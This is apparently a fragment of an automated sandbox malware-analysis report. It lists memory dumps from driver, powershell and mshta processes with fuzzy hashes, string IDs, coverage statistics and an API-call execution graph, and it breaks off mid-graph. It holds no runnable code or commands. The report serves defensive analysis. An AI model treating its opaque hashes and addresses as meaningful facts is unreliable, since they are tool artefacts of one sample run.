                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F018422A5E20786F7209F62986627E27E0EF44F0CF801035D94DC6A97DFACE504AA14
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$System$File
                                                                                                                                                                                                                                                • String ID: gfff
                                                                                                                                                                                                                                                • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                • Instruction ID: a5c736eb7f7d934903c4acd511603668516961c67b7fca4abe00a96c3b3beb78
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3601A7A2B1594582DF509B25F8011956790EBDC7C4F449032E68DC6795EE3CD6118710
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8G9F
                                                                                                                                                                                                                                                • API String ID: 0-4030070024
                                                                                                                                                                                                                                                • Opcode ID: 9b9865d8c88c16aabf23828a7571539a0dc2e03dd3f0c8cdad3b333cfa3c2a1a
                                                                                                                                                                                                                                                • Instruction ID: 784b2ace288b4a57de689768b8e056820d1f98ff2e35474d73d155db29f3c1da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b9865d8c88c16aabf23828a7571539a0dc2e03dd3f0c8cdad3b333cfa3c2a1a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E410932E0DB898FEBA5EB2C64115B4B7D1FF457A4F0901BAC04DCB187EA18AC05CB81
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8G9F
                                                                                                                                                                                                                                                • API String ID: 0-4030070024
                                                                                                                                                                                                                                                • Opcode ID: 642f1549dc4751e7fe58720763946cd7e2601a86074024aaa4af1ce39cd620a4
                                                                                                                                                                                                                                                • Instruction ID: d7042c24edb7673f967f95cd9d28c47678e48969e56929437c7e6da27aa6d90a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 642f1549dc4751e7fe58720763946cd7e2601a86074024aaa4af1ce39cd620a4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8112932D0DBC68FEBA5EB2C94505B4BBD0FF017A4B4901FAC08DDB096DA18AC45CB41
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5c3bcacec053f2e448cb7579d9ffa40b37ff50ad750722a07feabdfc08385165
                                                                                                                                                                                                                                                • Instruction ID: 213e0b44bd3e105e7583f255154788036d058594c8445e372069cd67227f2093
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c3bcacec053f2e448cb7579d9ffa40b37ff50ad750722a07feabdfc08385165
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41D15931E0EB8A9FE795AB2898155B5BBE0FF06794B1801FED04DC71D3DA18AC05CB91
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2c37f89a2635560a6678bf883adc0b3aad2d7cca79f6ef222c936605dc76cbd3
                                                                                                                                                                                                                                                • Instruction ID: ed7d55a51898a99477523652478dfc56b2b2ea11fd19724591edc1648e662d7a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c37f89a2635560a6678bf883adc0b3aad2d7cca79f6ef222c936605dc76cbd3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4510632E0DB968FE7A9EA2C6411674B7E2FF856A4F5901BAC04EC7193DE24EC058741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252218848.00007FF845F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF845F5D000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff845f5d000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e7cd9ac22c72c80b881e4cdab7299d319bcef34ea5716f7b5672b21ae0d13a7a
                                                                                                                                                                                                                                                • Instruction ID: e643146644208273dfcbcb94448c1ced80b1a538e765056c5e0eaffa0f4b1c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7cd9ac22c72c80b881e4cdab7299d319bcef34ea5716f7b5672b21ae0d13a7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2641257180DBC84FE7569B2898459627FF0EF52360B1501EFD188CF1E3DA25A846C793
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 87798ebea7b6a29ad14e450fda55ac2b5dee7eefd37a6ce91dde202fa1bec032
                                                                                                                                                                                                                                                • Instruction ID: 27d17cdf3f66dd0d483d3fbe1a1a870d8bf9a2d623745346ac56615f19b83388
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87798ebea7b6a29ad14e450fda55ac2b5dee7eefd37a6ce91dde202fa1bec032
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4531E93191CB484FDB589F5C9C466B9BBF0FBA9711F00426FD449D3252CA71A855CBC2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6e84927f7e112c8fc78b142a72261bdbf013b3cd81c819eb47d76c03e7e96aea
                                                                                                                                                                                                                                                • Instruction ID: bd2949b396229a539f2245c4fffc22e73debd1ea4e8af83e87e52263621df5b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e84927f7e112c8fc78b142a72261bdbf013b3cd81c819eb47d76c03e7e96aea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F731B27190CB488FDB59DF6C9C496E9BBF0EF66324F04416BD488C7152D624A41ACB92
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2253409359.00007FF846140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846140000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846140000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f8a97b7ef00f820c2375f5605dcaa2d8d7486162472f31c9dee09e5caf5c8cf7
                                                                                                                                                                                                                                                • Instruction ID: 7e729e0def9be9c3e2890f043c1eb39f8757935e509aa299b2e4372e998b56eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8a97b7ef00f820c2375f5605dcaa2d8d7486162472f31c9dee09e5caf5c8cf7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6821F632E0DB978FE7A9EA2C6450674A3D1FF447A8B5901BAC04EC71D3CE28EC008B41
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction ID: 9e76af21bce58cfd366eff7dbaedbf5c8f5e799c4dac718acbfc6f4453a67cdb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8301677151CB0C4FDB48EF0CE451AA5B7E0FB95364F10056DE58AC7691DA36E882CB45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 916e9e9653924fc8e182d8e713a4e24dc4e004c88d36778cbab07bc2e4b05d73
                                                                                                                                                                                                                                                • Instruction ID: d0b3215e487c1d387b7c3a66a1f9abd5a0600d5c497e186e000b9c4556e15d16
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 916e9e9653924fc8e182d8e713a4e24dc4e004c88d36778cbab07bc2e4b05d73
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07F0227690CA8D8FDB55EF2CD8654E9BFE0FFB6352B0401ABD549C7061D6215809CB81
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                                                                                                                                                                • API String ID: 0-4116931533
                                                                                                                                                                                                                                                • Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                                • Instruction ID: 8d26d588b44ff948662edfe4bee3202119ab881efda5d81b2ffc5b77bc3a3794
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21F3AB709566AFD30177ADBC515D86780DB966B674801B3D358CF903E91460CB87C1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                • API String ID: 0-1162251571
                                                                                                                                                                                                                                                • Opcode ID: 82b2251615890c69119d15616de730def3d4c9030800ac1adcb2a501efb8fdbc
                                                                                                                                                                                                                                                • Instruction ID: 9d32c09a01079ecf0edbf38fd76e127e2b512071229f1e7a4c161061fd5491c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82b2251615890c69119d15616de730def3d4c9030800ac1adcb2a501efb8fdbc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD31E4F3D0EBC65FE76A66785CB90A57FD0EF226A9B0900F6C4959F093FD1464068202
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2252842050.00007FF846070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846070000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7ff846070000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                                • API String ID: 0-3900292545
                                                                                                                                                                                                                                                • Opcode ID: cf03daf4439dadf00e0f390ad5885e85579cb6a4355d2f846d078805ada1ff05
                                                                                                                                                                                                                                                • Instruction ID: 90876b44f534a7b077a6849686ed16befdcb1ad20740fa8318bf185c727e4be4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf03daf4439dadf00e0f390ad5885e85579cb6a4355d2f846d078805ada1ff05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC4193A2E0E6C35FFB6A56394C79155BFA0FF726A9B0D01F6C0859F0D3E91928078712
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000003.2146465663.000001DBE0090000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001DBE0090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_3_1dbe0090000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                • Instruction ID: d67050cccc73c119d8949b23228f92c1a75419e0f5cf3b33dd9fa9f61ccdc7dc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF90021549941A99D42411D10C952DC614063C8350FD54495441791585D64D03965152
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 15ba4412952e8aa527a34a7c29a7c687a10a03d23d555c403451d5a64f6eb6eb
                                                                                                                                                                                                                                                • Instruction ID: e7e5eca3821664f4efdfea54643bd93f4caa760636fc7b01701de8965d1958db
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ba4412952e8aa527a34a7c29a7c687a10a03d23d555c403451d5a64f6eb6eb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE71D435E0CB498FEB45EB6CD8916ACBBF1FF5A350F14416ED049E7292CA35A842CB41
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.2324281601.00007FF846170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846170000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ff846170000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c4b7815d58da9778e1134f7b227bc70031a480b7268f099e185dfe0e707702e4
                                                                                                                                                                                                                                                • Instruction ID: c8ac2539ff23e26025347ea6c2ac5b82086ad4fdc4e0e19eed987ecb655c86c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4b7815d58da9778e1134f7b227bc70031a480b7268f099e185dfe0e707702e4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5411B32B1CE494FE799AA2C64522F9B3E2EF957B1B5C017EC10EC71C3ED19A8468641
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.2324281601.00007FF846170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF846170000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ff846170000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0658fb0bf540465deeee5291e197f814bd8f3ce1a9f66f2c8f0de145a6b40057
                                                                                                                                                                                                                                                • Instruction ID: 70c64eb5ca5247b283541bb9f3ff8cb4bb6d7883b73637b997710384d3f94d8d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0658fb0bf540465deeee5291e197f814bd8f3ce1a9f66f2c8f0de145a6b40057
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6141FC32F0DA594FEBA5A62854525F9B3E1EF447A2B5C41BAC40DC72C7FD18B8018741
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                • Instruction ID: c29b37a257e937936dc1d27c50b6fffa60713d567443325d460410e062f4e434
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C901677151CB0C4FDB48EF0CE451AA5B7E0FB95364F10056DE58AC7651DA36E881CB45
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000002F.00000002.2323726066.00007FF8460A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8460A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_47_2_7ff8460a0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (f2F$8f2F$Hf2F$Xf2F
                                                                                                                                                                                                                                                • API String ID: 0-2845594354
                                                                                                                                                                                                                                                • Opcode ID: 909523be92732ed3fca1c23d8fcf971d305cb7cffea69033a49250057e73a1ff
                                                                                                                                                                                                                                                • Instruction ID: a86819d140536e88ac84be352ed6f0921f0a489b33d3ffb654027c92472c4274
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 909523be92732ed3fca1c23d8fcf971d305cb7cffea69033a49250057e73a1ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28F08956E1FAC24FF676062C3C991798791FF519B8A1503FBC044531CF5865DC0A8640

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0.5%
                                                                                                                                                                                                                                                Total number of Nodes:1218
                                                                                                                                                                                                                                                Total number of Limit Nodes:32
                                                                                                                                                                                                                                                execution_graph 38217 7ff75428bb70 38220 7ff75428bb80 38217->38220 38229 7ff75428bae8 38220->38229 38222 7ff75428bb97 38223 7ff75428bb79 38222->38223 38234 7ff754251690 38222->38234 38225 7ff75428bbd5 LeaveCriticalSection 38227 7ff75428bae8 67 API calls 38225->38227 38226 7ff75428bbc8 SetEvent 38226->38225 38227->38222 38238 7ff75428b974 WaitForSingleObject 38229->38238 38232 7ff75428bb12 38232->38222 38233 7ff75428bb16 EnterCriticalSection LeaveCriticalSection 38233->38232 38235 7ff7542516a4 38234->38235 38236 7ff7542516c2 EnterCriticalSection 38234->38236 38235->38236 38246 7ff754251180 38235->38246 38236->38225 38236->38226 38239 7ff75428b986 GetLastError 38238->38239 38240 7ff75428b9b7 38238->38240 38244 7ff75425ca6c 48 API calls 3 library calls 38239->38244 38240->38232 38240->38233 38242 7ff75428b9a6 38245 7ff75425ca40 61 API calls _CxxThrowException 38242->38245 38244->38242 38245->38240 38247 7ff7542511ab 38246->38247 38251 7ff7542511b0 38246->38251 38256 7ff7542517c8 216 API calls 2 library calls 38247->38256 38249 7ff75425166a 38249->38235 38250 7ff754276d38 216 API calls 38250->38251 38251->38249 38251->38250 38252 7ff754251080 48 API calls 38251->38252 38253 7ff754276e90 216 API calls 38251->38253 38255 7ff754276fe8 216 API calls 38251->38255 38257 7ff7542517c8 216 API calls 2 library calls 38251->38257 38252->38251 38253->38251 38255->38251 38256->38251 38257->38251 38258 7ff75428a924 38259 7ff75428a949 snprintf 38258->38259 38260 7ff75428a97f CompareStringA 38259->38260 38261 7ff7542a9c74 38262 7ff7542a9c7c 38261->38262 38263 7ff7542a9cbb 38262->38263 38264 7ff7542a9cac 38262->38264 38265 7ff7542a9cc5 38263->38265 38283 7ff7542ace08 32 API calls 2 library calls 38263->38283 38282 7ff7542a4f3c 15 API calls setbuf 38264->38282 38270 7ff7542a4b8c 38265->38270 38269 7ff7542a9cb1 __scrt_fastfail 38271 7ff7542a4ba1 38270->38271 38272 7ff7542a4bab 38270->38272 38284 7ff7542a4ab4 38271->38284 38274 7ff7542a4bb0 38272->38274 38275 7ff7542a4bb7 __vcrt_getptd_noexit 38272->38275 38291 7ff7542a4a74 38274->38291 38277 7ff7542a4bf6 38275->38277 38280 7ff7542a4be0 RtlReAllocateHeap 38275->38280 38297 7ff7542a36c0 38275->38297 38300 7ff7542a4f3c 15 API calls setbuf 38277->38300 38279 7ff7542a4ba9 38279->38269 38280->38275 38280->38279 38282->38269 38283->38265 38285 7ff7542a4aff 38284->38285 38290 7ff7542a4ac3 __vcrt_getptd_noexit 38284->38290 38301 7ff7542a4f3c 15 API calls setbuf 38285->38301 38286 7ff7542a4ae6 RtlAllocateHeap 38288 7ff7542a4afd 38286->38288 38286->38290 38288->38279 38289 7ff7542a36c0 new 2 API calls 38289->38290 38290->38285 38290->38286 38290->38289 38292 7ff7542a4aa9 __vcrt_getptd_noexit 38291->38292 38293 7ff7542a4a79 RtlFreeHeap 38291->38293 38292->38279 38293->38292 38294 7ff7542a4a94 38293->38294 38302 7ff7542a4f3c 15 API calls setbuf 38294->38302 38296 7ff7542a4a99 GetLastError 38296->38292 38303 7ff7542a3700 38297->38303 38300->38279 38301->38288 38302->38296 38308 7ff7542a6938 EnterCriticalSection 38303->38308 38305 7ff7542a370d 38306 7ff7542a6998 fflush LeaveCriticalSection 38305->38306 38307 7ff7542a36d2 38306->38307 38307->38275 38309 7ff754247a5b 38310 7ff754247a60 38309->38310 38313 7ff754247af7 38310->38313 38342 7ff754259be0 38310->38342 38312 7ff754247bda 38353 7ff75424b540 38312->38353 38313->38312 38445 7ff754261e1c GetFileTime 38313->38445 38318 7ff75424b540 147 API calls 38321 7ff754247c9c 38318->38321 38319 7ff754247c3e 38319->38318 38320 7ff754247f89 38321->38320 38447 7ff754266378 38321->38447 38323 7ff754247cd7 38324 7ff754266378 4 API calls 38323->38324 38326 7ff754247cf3 38324->38326 38325 7ff754247de1 38332 7ff754247e4e 38325->38332 38458 7ff7542798dc 38325->38458 38326->38325 38328 7ff754247d59 38326->38328 38329 7ff754247d38 38326->38329 38331 7ff75429a444 new 4 API calls 38328->38331 38451 7ff75429a444 38329->38451 38336 7ff754247d42 std::bad_alloc::bad_alloc 38331->38336 38464 7ff754241204 48 API calls 38332->38464 38334 7ff754247eb3 38337 7ff754247edb 38334->38337 38465 7ff754279680 38334->38465 38336->38325 38457 7ff75429ba34 RtlPcToFileHeader RaiseException 38336->38457 38471 7ff754266424 8 API calls _UnwindNestedFrames 38337->38471 38339 7ff754247f56 38341 7ff75424b540 147 API calls 38339->38341 38341->38320 38472 7ff75425901c CryptAcquireContextW 38342->38472 38346 7ff754259c2a 38482 7ff754289ce4 38346->38482 38350 7ff754259c5b __BuildCatchObjectHelper 38492 7ff75429a610 38350->38492 38357 7ff75424b55f pre_c_initialization 38353->38357 38354 7ff75424b5a1 38355 7ff75424b5d8 38354->38355 38356 7ff75424b5b8 38354->38356 38631 7ff754278c1c 38355->38631 38517 7ff75424aba0 38356->38517 38357->38354 38513 7ff75424a4d0 38357->38513 38359 7ff75424b5d3 38361 7ff75429a610 _UnwindNestedFrames 8 API calls 38359->38361 38363 7ff754247bf8 38361->38363 38362 